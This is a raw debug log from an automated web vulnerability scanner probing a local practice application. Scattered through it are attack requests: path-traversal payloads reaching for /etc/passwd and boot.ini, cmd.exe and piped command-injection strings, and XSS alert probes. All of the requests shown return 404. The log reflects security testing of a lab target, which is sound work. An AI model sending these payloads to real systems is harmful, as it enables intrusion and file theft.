(id=22720,from_cache=0,grep=1,rtt=0.10,did=FlPDTVtM) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd returned HTTP code "404" (id=22721,from_cache=0,grep=1,rtt=0.12,did=jF7DqdmD) [Wed Feb 12 10:04:25 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] private_ip.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] motw.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] meta_generator.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] retirejs.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 10:04:26 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: 50lVeNPB) [Wed Feb 12 10:04:26 2020 - debug] svn_users.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/\x00/ returned HTTP code "404" (id=22719,from_cache=0,grep=1,rtt=0.08,did=YnIf50v7) [Wed Feb 12 10:04:26 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] blank_body.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] credit_cards.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] websockets_links.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] csp.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] dom_xss.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] file_upload.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] keys.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=22710,from_cache=0,grep=1,rtt=0.11,did=7qsyo7L7) [Wed Feb 12 10:04:26 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] clamav.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2098. [Wed Feb 12 10:04:26 2020 - debug] serialized_object.grep(uri="http://localhost:9090/svc/successful.pl") took 0.05s to run [Wed Feb 12 10:04:26 2020 - debug] symfony.grep(uri="http://localhost:9090/svc/successful.pl") took 0.07s to run [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir c:\\= returned HTTP code "404" (id=22722,from_cache=0,grep=1,rtt=0.11,did=7ihe8zLc) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1\x00 \\"> returned HTTP code "404" (id=22723,from_cache=0,grep=1,rtt=0.03,did=HnbuGeFy) [Wed Feb 12 10:04:26 2020 - debug] HEAD http://localhost:9090/nsn/..\\util/dsbrowse.bas returned HTTP code "404" (id=22724,from_cache=0,grep=1,rtt=0.10,did=a8YOUnLf) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4323. [Wed Feb 12 10:04:26 2020 - debug] expect_ct.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] HEAD http://localhost:9090/phpBB/My_eGallery/public/displayCategory.php returned HTTP code "404" (id=22727,from_cache=0,grep=1,rtt=0.09,did=pEuXETIN) [Wed Feb 12 10:04:26 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11590, 'reject-seen-url': 5565, 'reject-out-of-scope': 215, 'accept': 4730} [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4324. [Wed Feb 12 10:04:26 2020 - debug] url_session.grep(uri="http://localhost:9090/svc/successful.pl") took 0.03s to run [Wed Feb 12 10:04:26 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] objects.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] error_500.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] meta_tags.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] password_profiling.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] click_jacking.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] lang.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11591, 'reject-seen-url': 5565, 'reject-out-of-scope': 215, 'accept': 4731} [Wed Feb 12 10:04:26 2020 - debug] vulners_db.grep(uri="http://localhost:9090/svc/successful.pl") took 0.12s to run [Wed Feb 12 10:04:26 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=22726,from_cache=0,grep=1,rtt=0.13,did=ky4cdSXH) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini returned HTTP code "404" (id=22725,from_cache=0,grep=1,rtt=0.08,did=htiueXzc) [Wed Feb 12 10:04:26 2020 - debug] strange_reason.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] error_pages.grep(uri="http://localhost:9090/svc/successful.pl") took 0.02s to run [Wed Feb 12 10:04:26 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] cache_control.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] strange_headers.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] ssn.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] oracle.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] feeds.grep(uri="http://localhost:9090/svc/successful.pl") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2099. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4325. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4326. [Wed Feb 12 10:04:26 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/svc/successful.pl") took 0.01s to run [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4327. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4328. [Wed Feb 12 10:04:26 2020 - debug] Worker with ID AuditorWorker(gr1tRLjI) has been running job 2786 for 298.47 seconds. The job is: _audit(, , , , , , , , , , alert(\\"Vulnerable\\") returned HTTP code "404" (id=22728,from_cache=0,grep=1,rtt=0.07,did=8vahhSr9) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4330. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4331. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/cgicso?query= returned HTTP code "404" (id=22729,from_cache=0,grep=1,rtt=0.09,did=fIRe8jOY) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/niscache/ returned HTTP code "404" (id=22731,from_cache=0,grep=1,rtt=0.08,did=yySxvobq) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2100. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/iissamples/issamples/sqlqhit.asp returned HTTP code "404" (id=22733,from_cache=0,grep=1,rtt=0.06,did=2hF27dM5) [Wed Feb 12 10:04:26 2020 - debug] localhost:9090 connection pool stats (free:101 / in_use:5 / max:50 / total:106) [Wed Feb 12 10:04:26 2020 - debug] Connections with more in use time: (ae4284cec7365062, 0.10 sec) (badf9b3dd46a3a1c, 0.08 sec) (cfc650e1371fda81, 0.04 sec) (f68474ff126c8504, 0.03 sec) (650348b5951f295c, 0.00 sec) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/htgrep?file=index.html&hdr=/etc/passwd returned HTTP code "404" (id=22732,from_cache=0,grep=1,rtt=0.08,did=Z1QxgZKu) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4332. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd\x00html&cart_id= returned HTTP code "404" (id=22730,from_cache=0,grep=1,rtt=0.05,did=BHIiDXYg) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4333. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4334. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4335. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2101. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4336. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4337. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2102. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/index.jsp\x00x returned HTTP code "404" (id=22734,from_cache=0,grep=1,rtt=0.04,did=dUC4qMlQ) [Wed Feb 12 10:04:26 2020 - debug] HEAD http://localhost:9090/forum/My_eGallery/public/displayCategory.php returned HTTP code "404" (id=22735,from_cache=0,grep=1,rtt=0.11,did=sZDxLodG) [Wed Feb 12 10:04:26 2020 - debug] Updating socket timeout for localhost from 3.63 to 3.00 seconds [Wed Feb 12 10:04:26 2020 - debug] HEAD http://localhost:9090/perl/-e print Hello returned HTTP code "404" (id=22736,from_cache=0,grep=1,rtt=0.06,did=ntnGw6fU) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=22737,from_cache=0,grep=0,rtt=0.11,did=50lVeNPB) [Wed Feb 12 10:04:26 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: 50lVeNPB) [Wed Feb 12 10:04:26 2020 - debug] detailed._login() took 0.53s to run [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/php/php.exe?c:\\winnt\\boot.ini= returned HTTP code "404" (id=22739,from_cache=0,grep=1,rtt=0.06,did=wTGcAyNB) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/\x00/ returned HTTP code "404" (id=22740,from_cache=0,grep=1,rtt=0.04,did=DFXZQEzR) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/addyoursite.php?catid=<=<=&Script=>=>=&JavaScript:alert(\'Vulnerable\')=&/Script= returned HTTP code "404" (id=22741,from_cache=0,grep=1,rtt=0.07,did=C40OqSG3) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/alibaba.pl|dir ..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\, returned HTTP code "404" (id=22742,from_cache=0,grep=1,rtt=0.06,did=C1C7EtTy) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4338. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg= returned HTTP code "404" (id=22738,from_cache=0,grep=1,rtt=0.02,did=zcDvDzTI) [Wed Feb 12 10:04:26 2020 - debug] localhost:9090 connection pool stats (free:105 / in_use:3 / max:50 / total:108) [Wed Feb 12 10:04:26 2020 - debug] Connections with more in use time: (872ee7d98f5906e9, 0.06 sec) (49303da565ef873b, 0.05 sec) (badf9b3dd46a3a1c, 0.01 sec) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4339. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4340. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2103. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/phpBB/viewtopic.php?t=17071&highlight=\\">\\" returned HTTP code "404" (id=22744,from_cache=0,grep=1,rtt=0.08,did=dt6cnokZ) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/samples/search.dll?query=&logic=AND returned HTTP code "404" (id=22748,from_cache=0,grep=1,rtt=0.09,did=Czlibe5R) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/modules/Forums/bb_smilies.php?site_font=}--> returned HTTP code "404" (id=22749,from_cache=0,grep=1,rtt=0.12,did=tVh8UQDH) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/modules.php?op=modload&name=Guestbook&file=index&entry= returned HTTP code "404" (id=22750,from_cache=0,grep=1,rtt=0.17,did=WzBKCjxl) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/nav/cList.php?root=&email1= returned HTTP code "404" (id=22743,from_cache=0,grep=1,rtt=0.03,did=40GXq6sF) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=22745,from_cache=0,grep=1,rtt=0.10,did=EhfBaMjW) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/lpt9 returned HTTP code "404" (id=22747,from_cache=0,grep=1,rtt=0.01,did=ap9Rf0yn) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/administrator/gallery/gallery.php?directory=\\" returned HTTP code "404" (id=22746,from_cache=0,grep=1,rtt=0.08,did=iepQ8BXm) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/webcalendar/week.php?eventinfo= returned HTTP code "404" (id=22752,from_cache=0,grep=1,rtt=0.08,did=d3Ofb7jC) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\boot.ini returned HTTP code "404" (id=22753,from_cache=0,grep=1,rtt=0.15,did=NdtQCkyu) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd returned HTTP code "404" (id=22754,from_cache=0,grep=1,rtt=0.15,did=HCsMtky7) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2104. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4341. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=22756,from_cache=0,grep=1,rtt=0.07,did=maLpNjRb) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/page.cgi?../../../../../../../../../../etc/passwd= returned HTTP code "404" (id=22758,from_cache=0,grep=1,rtt=0.08,did=sQXusx7S) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2105. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/etc/passwd returned HTTP code "404" (id=22755,from_cache=0,grep=1,rtt=0.05,did=cfvlb9mT) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/search/SQLQHit.asp returned HTTP code "404" (id=22759,from_cache=0,grep=1,rtt=0.01,did=KLgeESgg) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/test.bat?|dir ..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\= returned HTTP code "404" (id=22760,from_cache=0,grep=1,rtt=0.07,did=4tMu8gUz) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/templates/form_header.php?noticemsg= returned HTTP code "404" (id=22762,from_cache=0,grep=1,rtt=0.13,did=6yUmP7O1) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/*.* returned HTTP code "404" (id=22757,from_cache=0,grep=1,rtt=0.05,did=YKfIYpXn) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4342. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2106. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4343. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd returned HTTP code "404" (id=22761,from_cache=0,grep=1,rtt=0.11,did=cHN1ywgp) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4344. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4345. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4346. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4346. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4346. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4347. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/pbcgi.cgi?name=Joemel&email= returned HTTP code "404" (id=22763,from_cache=0,grep=1,rtt=0.10,did=52qtGFlJ) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/rpcsvc/ returned HTTP code "404" (id=22765,from_cache=0,grep=1,rtt=0.07,did=lmniuzul) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/isapi/testisa.dll?check1= returned HTTP code "404" (id=22766,from_cache=0,grep=1,rtt=0.07,did=ak8CmcuG) [Wed Feb 12 10:04:26 2020 - debug] POST http://localhost:9090/servlet/CookieExample?cookiename= returned HTTP code "404" (id=22767,from_cache=0,grep=1,rtt=0.08,did=DhfbDNSb) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/phpping/index.php?pingto=www.test.com | dir c:\\\\ returned HTTP code "404" (id=22769,from_cache=0,grep=1,rtt=0.04,did=vIBRWp4U) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4348. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/.stm returned HTTP code "404" (id=22764,from_cache=0,grep=1,rtt=0.09,did=34bQwNFI) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=22771,from_cache=0,grep=1,rtt=0.04,did=Pa0vTuep) [Wed Feb 12 10:04:26 2020 - debug] HEAD http://localhost:9090/cgi-bin/classifieds/index.cgi returned HTTP code "404" (id=22770,from_cache=0,grep=1,rtt=0.10,did=T0jz83ZK) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/publisher/search.cgi?dir=jobs&template=&cat /etc/passwd|=&output_number=10 returned HTTP code "404" (id=22773,from_cache=0,grep=1,rtt=0.05,did=Na5mkjyE) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/betsie/parserl.pl/ returned HTTP code "404" (id=22768,from_cache=0,grep=1,rtt=0.06,did=UC6ArGm3) [Wed Feb 12 10:04:26 2020 - debug] symfony.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/?.jsp returned HTTP code "404" (id=22772,from_cache=0,grep=1,rtt=0.03,did=y4CZrWSg) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4349. [Wed Feb 12 10:04:26 2020 - debug] motw.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] private_ip.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] expect_ct.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] svn_users.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] file_upload.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4350. [Wed Feb 12 10:04:26 2020 - debug] meta_generator.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] retirejs.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] serialized_object.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] blank_body.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] credit_cards.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] websockets_links.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] csp.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] dom_xss.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] vulners_db.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] keys.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] clamav.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] objects.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] error_500.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] meta_tags.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] password_profiling.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] click_jacking.grep(uri="http://localhost:9090/svc/pay.jsp") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] 